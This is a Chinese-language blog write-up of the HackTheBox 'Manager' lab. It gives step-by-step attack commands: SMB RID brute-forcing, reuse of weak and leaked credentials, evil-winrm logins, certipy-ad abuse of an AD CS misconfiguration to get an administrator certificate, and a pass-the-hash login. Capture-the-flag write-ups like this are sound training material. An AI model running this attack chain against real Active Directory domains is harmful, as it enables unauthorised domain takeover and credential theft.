<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="懒"><meta name="theme-color" content="#2d4356"><meta name="baidu-site-verification"><title>HackTheBox Manager WriteUP | 忘返</title><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.png"><link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script><meta name="generator" content="Hexo 6.3.0"></head><link rel="stylesheet" type="text/css" href="/plugins/highlight/atom-one-dark.min.css"><script type="text/javascript" src="/plugins/highlight/highlight.min.js"></script><script>hljs.initHighlightingOnLoad();
</script><script type="text/javascript" src="/js/ready.js" async></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"><body class="night"><div class="mobile-head" id="mobile-head"><div class="navbar-icon"><span></span><span></span><span></span></div><div class="navbar-title"><a href="/">LITREILY</a></div><div class="navbar-search"><!--= show a circle here--></div></div><div class="h-wrapper" id="menu"><nav class="h-head box"><div class="m-hdimg"><a class="hdimg img" href="/"><img class="nofancybox" src="/img/profile.jpg" width="128" height="128"></a><h1 class="ttl"><a href="/">忘返</a></h1></div><p class="m-desc">正经人谁写日记啊。</p><div class="m-nav"><ul><li><span class="dot">●</span><a href="/archives/">归档</a></li><li><span class="dot">●</span><a href="/tags/">标签</a></li><li><span class="dot">●</span><a href="/about/">关于</a></li><li><span class="dot">●</span><a href="/links/">友链</a></li><li><span class="dot">●</span><a href="/Tips/">Tips</a></li><li class="m-sch"><form class="form" id="j-formsch" method="get"><input class="txt" type="text" id="local-search-input" name="q" value="搜索" onfocus="if(this.value=='搜索'){this.value='';}" onblur="if(this.value==''){this.value='搜索';}"><input type="text" style="display:none;"></form></li></ul><div id="local-search-result"></div></div></nav></div><div id="back2Top"><a class="fa fa-arrow-up" title="Back to top" href="#"></a></div><div class="box" id="container"><div class="l-wrapper"><div class="l-content box"><div class="l-post l-post-art"><article class="p-art"><div class="p-header box"><h1 class="p-title">HackTheBox Manager WriteUP</h1><div class="p-info"><span class="p-date"><i class="fa fa-calendar"></i><a href="/2023/10/30/HackTheBox-Manager-WriteUP/">2023-10-30</a></span><span class="p-view" id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span></span></div></div><div class="p-content"><h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-21.png" alt="logo"></p>
<h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><h3 id="Get-User"><a href="#Get-User" class="headerlink" title="Get User"></a>Get User</h3><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/2023-10-24-14-10-00-image.png"></p>
<h4 id="域名枚举"><a href="#域名枚举" class="headerlink" title="域名枚举"></a>域名枚举</h4><p>因为开着DNS服务，可以很方便的先收集一波子域名：</p>
<pre><code class="shell">dnsenum --dnsserver 10.10.11.236 --enum -p 0 -s 0 -o ~/HackTheBox/Manager/subdomain.txt -f /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt manager.htb
</code></pre>
<p>获取到主机名：<code>dc01.manager.htb</code></p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/2023-10-24-14-15-17-image.png"></p>
<h4 id="SMB用户名枚举-弱口令"><a href="#SMB用户名枚举-弱口令" class="headerlink" title="SMB用户名枚举&#x2F;弱口令"></a>SMB用户名枚举&#x2F;弱口令</h4><pre><code>crackmapexec smb manager.htb -u &quot;anonymous&quot; -p &quot;&quot; --rid-brute
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-1.png" alt="Alt text"></p>
<p><code>operator</code>账户存在弱口令：</p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-2.png" alt="operator"></p>
<h4 id="MSSQL弱口令"><a href="#MSSQL弱口令" class="headerlink" title="MSSQL弱口令"></a>MSSQL弱口令</h4><p>使用此密码尝试登录其他服务，登录MSSQL成功：</p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-3.png" alt="Alt text"></p>
<p>读取系统目录，发现网站备份文件：</p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-6.png" alt="Alt text"></p>
<h4 id="Web备份文件"><a href="#Web备份文件" class="headerlink" title="Web备份文件"></a>Web备份文件</h4><p>审计网站源码，发现配置文件中的账号密码：</p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-8.png" alt=".old-conf"></p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;ldap-conf xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;
   &lt;server&gt;
      &lt;host&gt;dc01.manager.htb&lt;/host&gt;
      &lt;open-port enabled=&quot;true&quot;&gt;389&lt;/open-port&gt;
      &lt;secure-port enabled=&quot;false&quot;&gt;0&lt;/secure-port&gt;
      &lt;search-base&gt;dc=manager,dc=htb&lt;/search-base&gt;
      &lt;server-type&gt;microsoft&lt;/server-type&gt;
      &lt;access-user&gt;
         &lt;user&gt;raven@manager.htb&lt;/user&gt;
         &lt;password&gt;R4v3nBe5tD3veloP3r!123&lt;/password&gt;
      &lt;/access-user&gt;
      &lt;uid-attribute&gt;cn&lt;/uid-attribute&gt;
   &lt;/server&gt;
   &lt;search type=&quot;full&quot;&gt;
      &lt;dir-list&gt;
         &lt;dir&gt;cn=Operator1,CN=users,dc=manager,dc=htb&lt;/dir&gt;
      &lt;/dir-list&gt;
   &lt;/search&gt;
&lt;/ldap-conf&gt;
</code></pre>
<p>使用此<code>evil-winrm</code>登录，获得user.txt：</p>
<pre><code>$ evil-winrm -u raven -p &#39;R4v3nBe5tD3veloP3r!123&#39; -i manager.htb
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-9.png" alt="Alt text"></p>
<h3 id="Get-Root"><a href="#Get-Root" class="headerlink" title="Get Root"></a>Get Root</h3><h4 id="收集用户名"><a href="#收集用户名" class="headerlink" title="收集用户名"></a>收集用户名</h4><p>Raven用户下可以看到完整的用户列表（crackmapexec默认只遍历RID1-4000的账户）：</p>
<pre><code>*Evil-WinRM* PS C:\Users\Raven\Documents&gt; Get-LocalUser

Name          Enabled Description
----          ------- -----------
Administrator True    Built-in account for administering the computer/domain
Guest         True    Built-in account for guest access to the computer/domain
krbtgt        False   Key Distribution Center Service Account
Zhong         True
Cheng         True
Ryan          True
Raven         True
JinWoo        True
ChinHae       True
Operator      True
</code></pre>
<p>查看是否有AD CS服务，检查到CA Name:<code>manager-DC01-CA</code></p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-11.png" alt="Alt text"></p>
<h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><p>利用证书配置错误，将raven提升为<code>officer</code>(Certificate Manager):</p>
<pre><code>certipy-ad ca -u raven@manager.htb -p &#39;R4v3nBe5tD3veloP3r!123&#39; -add-officer raven -ca &#39;manager-DC01-CA&#39;
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-12.png" alt="Alt text"></p>
<p>可以使用 <code>-enable-template</code> 参数在 CA 上启用 <code>SubCA</code> 模板。默认情况下，<code>SubCA</code> 模板已启用。</p>
<pre><code>certipy-ad ca -u raven@manager.htb -p &#39;R4v3nBe5tD3veloP3r!123&#39; -ca &#39;manager-DC01-CA&#39; -enable-template &#39;SubCA&#39;
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-13.png" alt="Alt text"></p>
<p>确认一下<code>SubCA</code>模板成功启用了</p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-14.png" alt="list"></p>
<p>请求基于 SubCA 模板的证书，记录下<code>request ID</code>：</p>
<pre><code>certipy-ad req -u raven@manager.htb -p &#39;R4v3nBe5tD3veloP3r!123&#39; -ca &#39;manager-DC01-CA&#39; -template SubCA -upn administrator@manager.htb -target manager.htb
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-15.png" alt="Alt text"></p>
<p>使用 <code>ca</code> 命令和参数发出失败的 <code>-issue-request &lt;request ID&gt;</code> 证书请求，然后使用 req 命令和参数检索颁发的 -retrieve <request ID> 证书：</p>
<pre><code>$ certipy-ad ca -u raven@manager.htb -p &#39;R4v3nBe5tD3veloP3r!123&#39; -ca &#39;manager-DC01-CA&#39; -issue-request 45 
$ certipy-ad req -u raven@manager.htb -p &#39;R4v3nBe5tD3veloP3r!123&#39; -ca &#39;manager-DC01-CA&#39; -target manager.htb -retrieve 45
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-16.png" alt="Alt text"></p>
<p>验证证书，提取哈希：</p>
<pre><code>certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236 -domain manager.htb -username administrator
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-17.png" alt="Alt text"></p>
<p>利用hash登录administrator账户，获得root.txt</p>
<pre><code>evil-winrm -u administrator -H ae5064c2f62317332c88629e025924ef -i manager.htb
</code></pre>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-18.png" alt="Alt text"></p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-20.png" alt="Alt text"></p>
<p><img src="/2023/10/30/HackTheBox-Manager-WriteUP/image-19.png" alt="Alt text"></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>前前后后忙活了一个星期，在赛季结束之前把flag提交了。中间卡住很多次，比如爆破账号密码的时候直接用了字典，没有想到把用户名加到密码表中。以及后续提权，基本是把所有收集到的信息，对照网上查到的资料，一样一样的尝试（所以完整的wp写了700多行……），最后才root。</p>
<p>收获颇丰，收获颇丰。</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><ul>
<li><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#attack-2">https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#attack-2</a></li>
</ul>
</div><div class="p-copyright"><blockquote><div class="p-copyright-author"><span class="p-copyright-key">本文作者：</span><span class="p-copytight-value"><a href="mailto:litreily@163.com">忘返</a></span></div><div class="p-copyright-link"><span class="p-copyright-key">本文链接：</span><span class="p-copytight-value"><a href="/2023/10/30/HackTheBox-Manager-WriteUP/">https://7mitu.github.io/2023/10/30/HackTheBox-Manager-WriteUP/</a></span></div><div class="p-copyright-note"><span class="p-copyright-key">版权声明：</span><span class="p-copytight-value">本博客所有文章除特殊声明外，均采用<a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/"> CC BY-NC 4.0 </a>许可协议。转载请注明出处 <a href="https://7mitu.github.io">忘返的博客</a>！</span></div></blockquote></div></article><div class="p-info box"><span class="p-tags"><i class="fa fa-tags"></i><a href="/tags/HackTheBox/">HackTheBox</a><a href="/tags/AD-CS/">AD CS</a><a href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/">域渗透</a><a href="/tags/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/">暴力破解</a><a href="/tags/%E5%BC%B1%E5%8F%A3%E4%BB%A4/">弱口令</a><a href="/tags/SMB/">SMB</a></span></div><aside id="toc"><div class="toc-title">目录</div><nav><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">解题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-User"><span class="toc-number">2.1.</span> <span class="toc-text">Get User</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">2.1.1.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%9F%9F%E5%90%8D%E6%9E%9A%E4%B8%BE"><span class="toc-number">2.1.2.</span> <span class="toc-text">域名枚举</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SMB%E7%94%A8%E6%88%B7%E5%90%8D%E6%9E%9A%E4%B8%BE-%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="toc-number">2.1.3.</span> <span class="toc-text">SMB用户名枚举&#x2F;弱口令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MSSQL%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="toc-number">2.1.4.</span> <span class="toc-text">MSSQL弱口令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Web%E5%A4%87%E4%BB%BD%E6%96%87%E4%BB%B6"><span class="toc-number">2.1.5.</span> <span class="toc-text">Web备份文件</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-Root"><span class="toc-number">2.2.</span> <span class="toc-text">Get Root</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%B6%E9%9B%86%E7%94%A8%E6%88%B7%E5%90%8D"><span class="toc-number">2.2.1.</span> <span class="toc-text">收集用户名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">2.2.2.</span> <span class="toc-text">提权</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E8%AE%B0"><span class="toc-number">3.</span> <span class="toc-text">后记</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-number">4.</span> <span class="toc-text">参考资料</span></a></li></ol></nav></aside></div><section class="p-ext"><div class="l-pager l-pager-dtl box"><a class="next" href="/2023/10/23/HackTheBox-Sandworm-WriteUP/">HackTheBox Sandworm WriteUP &gt;</a></div></section><footer><p>Copyright © 2016 - 2023 <a href="/." rel="nofollow">忘返</a> | <strong><a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/">CC BY-NC 4.0</a></strong><br><span id="busuanzi_container_site_uv"><i class="fa fa-user"></i><span id="busuanzi_value_site_uv"></span></span> <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_site_pv"></span></span> | Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a>Theme with<a rel="nofollow" target="_blank" href="https://github.com/litreily/snark-hexo"> snark.</a></p></footer></div></div></div><script type="text/javascript" src="/js/search.js"></script><script type="text/javascript" src="/js/top.js"></script><script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
    search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1" async></script></body></html>